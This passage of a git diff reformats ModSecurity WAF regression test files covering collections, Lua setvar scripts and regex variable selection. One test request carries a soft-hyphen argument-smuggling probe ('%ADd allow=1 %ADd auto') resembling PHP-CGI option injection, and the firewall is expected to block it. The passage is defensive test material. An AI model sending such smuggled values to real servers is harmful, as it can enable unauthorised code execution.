(.NET CLR 3.5.30729)", - "Accept": "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", + "User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-us,en;q=0.5", "Accept-Encoding": "gzip,deflate", "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", @@ -454,14 +490,23 @@ "Pragma": "no-cache", "Cache-Control": "no-cache" }, - "uri": "\/test.pl?param1=test¶m2=%20tEst2", + "uri": "/test.pl?param1=test¶m2=%20tEst2", "method": "GET", "http_version": 1.1, - "body": "" + "body": [ + "" + ] + }, + "response": { + "headers": { + + }, + "body": [ + "" + ] }, "expected": { "audit_log": "\\[msg \"testmsg\"\\] \\[data \"testdata\"\\] \\[severity \"7\"\\] \\[ver \"\"\\] \\[maturity \"0\"\\] \\[accuracy \"0\"\\] \\[tag \"testtag1\"\\] \\[tag \"testtag2\"\\]", - "error_log": "", "http_code": 403 }, "rules": [ @@ -494,8 +539,8 @@ "request": { "headers": { "Host": "www.modsecurity.org", - "User-Agent": "Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\/20091102 Firefox\/3.5.5 (.NET CLR 3.5.30729)", - "Accept": "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", + "User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-us,en;q=0.5", "Accept-Encoding": "gzip,deflate", "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", @@ -504,14 +549,16 @@ "Pragma": "no-cache", "Cache-Control": "no-cache" }, - "uri": "\/test.pl?param1= test ¶m2=test2", + "uri": "/test.pl?param1= test ¶m2=test2", "method": "GET", "http_version": 1.1, - "body": "" + "body": [ + "" + ] }, "response": { "headers": { - "Content-Type": "plain\/text\n\r" + "Content-Type": "plain/text\n\r" }, "body": [ "test" @@ -519,8 +566,6 @@ }, "expected": { "audit_log": "\\[audit\\.log]:\\ ---.*\\[audit\\.log]:\\ Keep-Alive", - "debug_log": "", - "error_log": "", "http_code": 403 }, "rules": [ @@ -553,8 +598,8 @@ "request": { "headers": { "Host": "www.modsecurity.org", - "User-Agent": "Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\/20091102 Firefox\/3.5.5 (.NET CLR 3.5.30729)", - "Accept": "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", + "User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-us,en;q=0.5", "Accept-Encoding": "gzip,deflate", "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", @@ -563,14 +608,16 @@ "Pragma": "no-cache", "Cache-Control": "no-cache" }, - "uri": "\/?%ADd+allow%3d1+%ADd+auto", + "uri": "/?%ADd+allow%3d1+%ADd+auto", "method": "GET", "http_version": 1.1, - "body": "" + "body": [ + "" + ] }, "response": { "headers": { - "Content-Type": "plain\/text\n\r" + "Content-Type": "plain/text\n\r" }, "body": [ "test" @@ -578,8 +625,6 @@ }, "expected": { "audit_log": "\"match\":\"Matched \\\\\"Operator `ValidateUtf8Encoding' with parameter `' against variable `ARGS_NAMES:\\\\\\\\xadd allow=1 \\\\\\\\xadd auto' \\(Value: `\\\\\\\\xadd allow=1 \\\\\\\\xadd auto' \\)\"", - "debug_log": "", - "error_log": "", "http_code": 403 }, "rules": [ @@ -612,8 +657,8 @@ "request": { "headers": { "Host": "www.modsecurity.org", - "User-Agent": "Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\/20091102 Firefox\/3.5.5 (.NET CLR 3.5.30729)", - "Accept": "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", + "User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-us,en;q=0.5", "Accept-Encoding": "gzip,deflate", "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", @@ -624,16 +669,16 @@ "Content-Type": "application/x-www-form-urlencoded", "Content-Length": "3" }, - "uri": "\/?attack=true", + "uri": "/?attack=true", "method": "POST", "http_version": 1.1, "body": [ - "\u00ad=\u00ad" + "­=­" ] }, "response": { "headers": { - "Content-Type": "plain\/text\n\r" + "Content-Type": "plain/text\n\r" }, "body": [ "test" @@ -641,8 +686,6 @@ }, "expected": { "audit_log": "\"body\":\"\\\\\\\\xc2\\\\\\\\xad=\\\\\\\\xc2\\\\\\\\xad", - "debug_log": "", - "error_log": "", "http_code": 403 }, "rules": [ @@ -675,8 +718,8 @@ "request": { "headers": { "Host": "www.modsecurity.org", - "User-Agent": "Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\/20091102 Firefox\/3.5.5 (.NET CLR 3.5.30729)", - "Accept": "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", + "User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-us,en;q=0.5", "Accept-Encoding": "gzip,deflate", "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", @@ -686,18 +729,18 @@ "Cache-Control": "no-cache", "Content-Type": "application/x-www-form-urlencoded", "Content-Length": "3", - "X-\u00ad-custom": "Some \u00ad value" + "X-­-custom": "Some ­ value" }, - "uri": "\/?attack=true", + "uri": "/?attack=true", "method": "POST", "http_version": 1.1, "body": [ - "\u00ad=\u00ad" + "­=­" ] }, "response": { "headers": { - "Content-Type": "plain\/text\n\r" + "Content-Type": "plain/text\n\r" }, "body": [ "test" @@ -705,8 +748,6 @@ }, "expected": { "audit_log": "\"X-\\\\\\\\xc2\\\\\\\\xad-custom\":\"Some \\\\\\\\xc2\\\\\\\\xad value\"", - "debug_log": "", - "error_log": "", "http_code": 403 }, "rules": [ diff --git a/test/test-cases/regression/collection-case-insensitive.json b/test/test-cases/regression/collection-case-insensitive.json index 83c3a4d818..163e1be4a2 100644 --- a/test/test-cases/regression/collection-case-insensitive.json +++ b/test/test-cases/regression/collection-case-insensitive.json @@ -1,57 +1,58 @@ [ { - "enabled":1, - "version_min":300000, - "version_max":0, - "title":"Testing collection :: Case insensitive (1/1)", - "client":{ - "ip":"200.249.12.31", - "port":2313 + "enabled": 1, + "version_min": 300000, + "version_max": 0, + "title": "Testing collection :: Case insensitive (1/1)", + "client": { + "ip": "200.249.12.31", + "port": 2313 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "User-Agent":"Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\/20091102 Firefox\/3.5.5 (.NET CLR 3.5.30729)", - "Accept":"text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", - "Accept-Language":"en-us,en;q=0.5", - "Accept-Encoding":"gzip,deflate", - "Accept-Charset":"ISO-8859-1,utf-8;q=0.7,*;q=0.7", - "Keep-Alive":"300", - "Connection":"keep-alive", - "Cookie":"PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", - "Pragma":"no-cache", - "Cache-Control":"no-cache" + "request": { + "headers": { + "User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", + "Accept-Language": "en-us,en;q=0.5", + "Accept-Encoding": "gzip,deflate", + "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", + "Keep-Alive": "300", + "Connection": "keep-alive", + "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", + "Pragma": "no-cache", + "Cache-Control": "no-cache" }, - "uri":"\/test.pl?param1= test ¶m2=test2", - "method":"GET", - "http_version":1.1, - "body":"" + "uri": "/test.pl?param1= test ¶m2=test2", + "method": "GET", + "http_version": 1.1, + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Content-Type":"text\/xml; charset=utf-8\n\r", - "Content-Length":"length\n\r" + "response": { + "headers": { + "Content-Type": "text/xml; charset=utf-8\n\r", + "Content-Length": "length\n\r" }, - "body":[ + "body": [ "\n\r", - "\n\r", + "\n\r", " \n\r", - " \n\r", - " string<\/EnlightenResult>\n\r", - " <\/EnlightenResponse>\n\r", - " <\/soap:Body>\n\r", - "<\/soap:Envelope>\n\r" + " \n\r", + " string\n\r", + " \n\r", + " \n\r", + "\n\r" ] }, - "expected":{ - "audit_log":"", - "debug_log":"Target value: \"matched_var:PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120\" \\(Variable: TX:something\\)", - "error_log":"" + "expected": { + "debug_log": "Target value: \"matched_var:PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120\" \\(Variable: TX:something\\)", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule REQUEST_headers \"@contains PHPSESSID\" \"id:1,t:lowercase,t:none,setvar:TX.something=matched_var:%{matched_var}%\"", "SecRule TX \"@contains to_test\" \"id:2,t:lowercase,t:none\"" diff --git a/test/test-cases/regression/collection-lua.json b/test/test-cases/regression/collection-lua.json index 8d8f4e129f..0870acbe37 100644 --- a/test/test-cases/regression/collection-lua.json +++ b/test/test-cases/regression/collection-lua.json @@ -1,292 +1,314 @@ [ { - "enabled":1, - "version_min":300000, - "title":"Testing LUA :: m.set TX (1/7)", - "resource":"lua", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"My sweet little browser", - "Accept":"*/*", + "enabled": 1, + "version_min": 300000, + "title": "Testing LUA :: m.set TX (1/7)", + "resource": "lua", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "My sweet little browser", + "Accept": "*/*", "Content-Length": "0" }, - "uri":"/whee?res=1", - "method":"GET", - "body": [ ] + "uri": "/whee?res=1", + "method": "GET", + "body": [ + "" + ] }, - "response":{ - "headers":{}, - "body":[ + "response": { + "headers": { + + }, + "body": [ "no need." ] }, - "expected":{ - "audit_log":"", - "debug_log":"Target value: \"2\" \\(Variable: TX.lua_set_var\\)", - "error_log":"" + "expected": { + "debug_log": "Target value: \"2\" \\(Variable: TX.lua_set_var\\)", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecAction \"id:1,pass,setvar:TX.lua_set_var=1\"", "SecRuleScript test-cases/data/setvar.lua \"id:2,pass\"", "SecRule TX.lua_set_var \"@contains 2\" \"id:3,t:none\"" ] - }, + }, { - "enabled":1, - "version_min":300000, - "title":"Testing LUA :: m.set IP (2/7)", - "resource":"lua", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"My sweet little browser", - "Accept":"*/*", + "enabled": 1, + "version_min": 300000, + "title": "Testing LUA :: m.set IP (2/7)", + "resource": "lua", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "My sweet little browser", + "Accept": "*/*", "Content-Length": "0" }, - "uri":"/whee?res=1", - "method":"GET", - "body": [ ] + "uri": "/whee?res=1", + "method": "GET", + "body": [ + "" + ] }, - "response":{ - "headers":{}, - "body":[ + "response": { + "headers": { + + }, + "body": [ "no need." ] }, - "expected":{ - "audit_log":"", - "debug_log":"Target value: \"2\" \\(Variable: IP:::::lua_set_var\\)", - "error_log":"" + "expected": { + "debug_log": "Target value: \"2\" \\(Variable: IP:::::lua_set_var\\)", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecAction \"id:1,pass,setvar:IP.lua_set_var=1\"", "SecRuleScript test-cases/data/setvar.lua \"id:2,pass\"", "SecRule IP.lua_set_var \"@contains 2\" \"id:3,t:none\"" ] - }, + }, { - "enabled":1, - "version_min":300000, - "title":"Testing LUA :: m.set GLOBAL (3/7)", - "resource":"lua", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"My sweet little browser", - "Accept":"*/*", + "enabled": 1, + "version_min": 300000, + "title": "Testing LUA :: m.set GLOBAL (3/7)", + "resource": "lua", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "My sweet little browser", + "Accept": "*/*", "Content-Length": "0" }, - "uri":"/whee?res=1", - "method":"GET", - "body": [ ] + "uri": "/whee?res=1", + "method": "GET", + "body": [ + "" + ] }, - "response":{ - "headers":{}, - "body":[ + "response": { + "headers": { + + }, + "body": [ "no need." ] }, - "expected":{ - "audit_log":"", - "debug_log":"Target value: \"2\" \\(Variable: GLOBAL:::::lua_set_var\\)", - "error_log":"" + "expected": { + "debug_log": "Target value: \"2\" \\(Variable: GLOBAL:::::lua_set_var\\)", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecAction \"id:1,pass,setvar:GLOBAL.lua_set_var=1\"", "SecRuleScript test-cases/data/setvar.lua \"id:2,pass\"", "SecRule GLOBAL.lua_set_var \"@contains 2\" \"id:3,t:none\"" ] - }, + }, { - "enabled":1, - "version_min":300000, - "title":"Testing LUA :: m.set RESOURCE (4/7)", - "resource":"lua", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"My sweet little browser", - "Accept":"*/*", + "enabled": 1, + "version_min": 300000, + "title": "Testing LUA :: m.set RESOURCE (4/7)", + "resource": "lua", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "My sweet little browser", + "Accept": "*/*", "Content-Length": "0" }, - "uri":"/whee?res=1", - "method":"GET", - "body": [ ] + "uri": "/whee?res=1", + "method": "GET", + "body": [ + "" + ] }, - "response":{ - "headers":{}, - "body":[ + "response": { + "headers": { + + }, + "body": [ "no need." ] }, - "expected":{ - "audit_log":"", - "debug_log":"Target value: \"2\" \\(Variable: RESOURCE:::::lua_set_var\\)", - "error_log":"" + "expected": { + "debug_log": "Target value: \"2\" \\(Variable: RESOURCE:::::lua_set_var\\)", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecAction \"id:1,pass,setvar:RESOURCE.lua_set_var=1\"", "SecRuleScript test-cases/data/setvar.lua \"id:2,pass\"", "SecRule RESOURCE.lua_set_var \"@contains 2\" \"id:3,t:none\"" ] - }, - { - "enabled":1, - "version_min":300000, - "title":"Testing LUA :: m.set SESSION (5/7)", - "resource":"lua", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"My sweet little browser", - "Accept":"*/*", + }, + { + "enabled": 1, + "version_min": 300000, + "title": "Testing LUA :: m.set SESSION (5/7)", + "resource": "lua", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "My sweet little browser", + "Accept": "*/*", "Content-Length": "0" }, - "uri":"/whee?res=1", - "method":"GET", - "body": [ ] + "uri": "/whee?res=1", + "method": "GET", + "body": [ + "" + ] }, - "response":{ - "headers":{}, - "body":[ + "response": { + "headers": { + + }, + "body": [ "no need." ] }, - "expected":{ - "audit_log":"", - "debug_log":"Target value: \"2\" \\(Variable: SESSION:::::lua_set_var\\)", - "error_log":"" + "expected": { + "debug_log": "Target value: \"2\" \\(Variable: SESSION:::::lua_set_var\\)", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecAction \"id:1,pass,setvar:SESSION.lua_set_var=1\"", "SecRuleScript test-cases/data/setvar.lua \"id:2,pass\"", "SecRule SESSION.lua_set_var \"@contains 2\" \"id:3,t:none\"" ] - }, - { - "enabled":1, - "version_min":300000, - "title":"Testing LUA :: m.set USER (6/7)", - "resource":"lua", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"My sweet little browser", - "Accept":"*/*", + }, + { + "enabled": 1, + "version_min": 300000, + "title": "Testing LUA :: m.set USER (6/7)", + "resource": "lua", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "My sweet little browser", + "Accept": "*/*", "Content-Length": "0" }, - "uri":"/whee?res=1", - "method":"GET", - "body": [ ] + "uri": "/whee?res=1", + "method": "GET", + "body": [ + "" + ] }, - "response":{ - "headers":{}, - "body":[ + "response": { + "headers": { + + }, + "body": [ "no need." ] }, - "expected":{ - "audit_log":"", - "debug_log":"Target value: \"2\" \\(Variable: USER:::::lua_set_var\\)", - "error_log":"" + "expected": { + "debug_log": "Target value: \"2\" \\(Variable: USER:::::lua_set_var\\)", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecAction \"id:1,pass,setvar:USER.lua_set_var=1\"", "SecRuleScript test-cases/data/setvar.lua \"id:2,pass\"", "SecRule USER.lua_set_var \"@contains 2\" \"id:3,t:none\"" ] - }, - { - "enabled":1, - "version_min":300000, - "title":"Testing LUA :: m.getvars ARGS (8/8)", - "resource":"lua", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"My sweet little browser", - "Accept":"*/*", + }, + { + "enabled": 1, + "version_min": 300000, + "title": "Testing LUA :: m.getvars ARGS (8/8)", + "resource": "lua", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "My sweet little browser", + "Accept": "*/*", "Content-Length": "0" }, - "uri":"/whee?parm1=a&parm2=b", - "method":"GET", - "body": [ ] + "uri": "/whee?parm1=a&parm2=b", + "method": "GET", + "body": [ + "" + ] }, - "response":{ - "headers":{}, - "body":[ + "response": { + "headers": { + + }, + "body": [ "no need." ] }, - "expected":{ + "expected": { "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRuleScript test-cases/data/match-getvars-args.lua \"id:2,phase:2,deny,status:403\"" ] - } + } ] diff --git a/test/test-cases/regression/collection-regular_expression_selection.json b/test/test-cases/regression/collection-regular_expression_selection.json index 5ac6db40a2..f61865dd97 100644 --- a/test/test-cases/regression/collection-regular_expression_selection.json +++ b/test/test-cases/regression/collection-regular_expression_selection.json @@ -1,58 +1,58 @@ [ { - "enabled":1, - "version_min":300000, - "version_max":0, - "title":"Testing collection :: TX/regular expression (1/2)", - "client":{ - "ip":"200.249.12.31", - "port":2313 + "enabled": 1, + "version_min": 300000, + "version_max": 0, + "title": "Testing collection :: TX/regular expression (1/2)", + "client": { + "ip": "200.249.12.31", + "port": 2313 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "User-Agent":"Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\/20091102 Firefox\/3.5.5 (.NET CLR 3.5.30729)", - "Accept":"text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", - "Accept-Language":"en-us,en;q=0.5", - "Accept-Encoding":"gzip,deflate", - "Accept-Charset":"ISO-8859-1,utf-8;q=0.7,*;q=0.7", - "Keep-Alive":"300", - "Connection":"keep-alive", - "Cookie":"PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", - "Pragma":"no-cache", - "Cache-Control":"no-cache" + "request": { + "headers": { + "User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", + "Accept-Language": "en-us,en;q=0.5", + "Accept-Encoding": "gzip,deflate", + "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", + "Keep-Alive": "300", + "Connection": "keep-alive", + "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", + "Pragma": "no-cache", + "Cache-Control": "no-cache" }, - "uri":"\/test.pl?id_a=test&nah=nops", - "method":"GET", - "http_version":1.1, - "body":"" + "uri": "/test.pl?id_a=test&nah=nops", + "method": "GET", + "http_version": 1.1, + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Content-Type":"text\/xml; charset=utf-8\n\r", - "Content-Length":"length\n\r" + "response": { + "headers": { + "Content-Type": "text/xml; charset=utf-8\n\r", + "Content-Length": "length\n\r" }, - "body":[ + "body": [ "\n\r", - "\n\r", + "\n\r", " \n\r", - " \n\r", - " string<\/EnlightenResult>\n\r", - " <\/EnlightenResponse>\n\r", - " <\/soap:Body>\n\r", - "<\/soap:Envelope>\n\r" + " \n\r", + " string\n\r", + " \n\r", + " \n\r", + "\n\r" ] }, - "expected":{ - "audit_log":"", - "debug_log":"Saving variable: IP:nah with value: nops", - "error_log":"", - "http_code":200 + "expected": { + "debug_log": "Saving variable: IP:nah with value: nops", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule ARGS:/^id_/ \"@contains test\" \"id:1,phase:2,t:lowercase,initcol:ip=%{REMOTE_ADDR}\"", "SecRule ARGS:/^id_/ \"@contains test\" \"id:2,phase:2,t:lowercase,setvar:IP.nah=nops\"", @@ -60,58 +60,59 @@ ] }, { - "enabled":1, - "version_min":300000, - "version_max":0, - "title":"Testing collection :: TX/regular expression (2/2)", - "client":{ - "ip":"200.249.12.31", - "port":2313 + "enabled": 1, + "version_min": 300000, + "version_max": 0, + "title": "Testing collection :: TX/regular expression (2/2)", + "client": { + "ip": "200.249.12.31", + "port": 2313 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "User-Agent":"Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\/20091102 Firefox\/3.5.5 (.NET CLR 3.5.30729)", - "Accept":"text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", - "Accept-Language":"en-us,en;q=0.5", - "Accept-Encoding":"gzip,deflate", - "Accept-Charset":"ISO-8859-1,utf-8;q=0.7,*;q=0.7", - "Keep-Alive":"300", - "Connection":"keep-alive", - "Cookie":"PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", - "Pragma":"no-cache", - "Cache-Control":"no-cache" + "request": { + "headers": { + "User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", + "Accept-Language": "en-us,en;q=0.5", + "Accept-Encoding": "gzip,deflate", + "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", + "Keep-Alive": "300", + "Connection": "keep-alive", + "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", + "Pragma": "no-cache", + "Cache-Control": "no-cache" }, - "uri":"\/test.pl?id_a=test&nah=nops", - "method":"GET", - "http_version":1.1, - "body":"" + "uri": "/test.pl?id_a=test&nah=nops", + "method": "GET", + "http_version": 1.1, + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Content-Type":"text\/xml; charset=utf-8\n\r", - "Content-Length":"length\n\r" + "response": { + "headers": { + "Content-Type": "text/xml; charset=utf-8\n\r", + "Content-Length": "length\n\r" }, - "body":[ + "body": [ "\n\r", - "\n\r", + "\n\r", " \n\r", - " \n\r", - " string<\/EnlightenResult>\n\r", - " <\/EnlightenResponse>\n\r", - " <\/soap:Body>\n\r", - "<\/soap:Envelope>\n\r" + " \n\r", + " string\n\r", + " \n\r", + " \n\r", + "\n\r" ] }, - "expected":{ - "audit_log":"", - "debug_log":"Saving variable: IP:id_a with value: nops", - "http_code":403 + "expected": { + "debug_log": "Saving variable: IP:id_a with value: nops", + "http_code": 403 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule ARGS:/^id_/ \"@contains test\" \"id:11,phase:2,t:lowercase,initcol:ip=%{REMOTE_ADDR}\"", "SecRule ARGS:/^id_/ \"@contains test\" \"id:12,phase:2,t:lowercase,setvar:IP.id_a=nops\"", diff --git a/test/test-cases/regression/collection-resource.json b/test/test-cases/regression/collection-resource.json index b73d00cb14..762fd84129 100644 --- a/test/test-cases/regression/collection-resource.json +++ b/test/test-cases/regression/collection-resource.json @@ -1,49 +1,51 @@ [ { - "enabled":1, - "version_min":300000, - "version_max":0, - "title":"Testing collection :: RESOURCE (1/2)", - "client":{ - "ip":"200.249.12.31", - "port":2313 + "enabled": 1, + "version_min": 300000, + "version_max": 0, + "title": "Testing collection :: RESOURCE (1/2)", + "client": { + "ip": "200.249.12.31", + "port": 2313 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "User-Agent":"Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\/20091102 Firefox\/3.5.5 (.NET CLR 3.5.30729)", - "Accept":"text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", - "Accept-Language":"en-us,en;q=0.5", - "Accept-Encoding":"gzip,deflate", - "Accept-Charset":"ISO-8859-1,utf-8;q=0.7,*;q=0.7", - "Keep-Alive":"300", - "Connection":"keep-alive", - "Cookie":"PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", - "Pragma":"no-cache", - "Cache-Control":"no-cache" + "request": { + "headers": { + "User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", + "Accept-Language": "en-us,en;q=0.5", + "Accept-Encoding": "gzip,deflate", + "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", + "Keep-Alive": "300", + "Connection": "keep-alive", + "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", + "Pragma": "no-cache", + "Cache-Control": "no-cache" }, - "uri":"\/test.pl?resource=whee", - "method":"GET", - "http_version":1.1, - "body":"" + "uri": "/test.pl?resource=whee", + "method": "GET", + "http_version": 1.1, + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Content-Type":"text\/xml; charset=utf-8\n\r", - "Content-Length":"length\n\r" + "response": { + "headers": { + "Content-Type": "text/xml; charset=utf-8\n\r", + "Content-Length": "length\n\r" }, - "body":[ + "body": [ + "" ] }, - "expected":{ - "audit_log":"", - "debug_log":"Target value: \"123\" \\(Variable: RESOURCE:whee::::test\\)", - "error_log":"" + "expected": { + "debug_log": "Target value: \"123\" \\(Variable: RESOURCE:whee::::test\\)", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule ARGS:resource \"@unconditionalmatch \" \"phase:2,pass,initcol:resource=%{ARGS.resource},id:900003\"", "SecRule ARGS:resource \"@unconditionalmatch \" \"phase:2,pass,setvar:resource.test=123,id:900000\"", @@ -52,50 +54,52 @@ ] }, { - "enabled":1, - "version_min":300000, - "version_max":0, - "title":"Testing collection :: RESOURCE (2/2)", - "client":{ - "ip":"200.249.12.31", - "port":2313 + "enabled": 1, + "version_min": 300000, + "version_max": 0, + "title": "Testing collection :: RESOURCE (2/2)", + "client": { + "ip": "200.249.12.31", + "port": 2313 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "User-Agent":"Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\/20091102 Firefox\/3.5.5 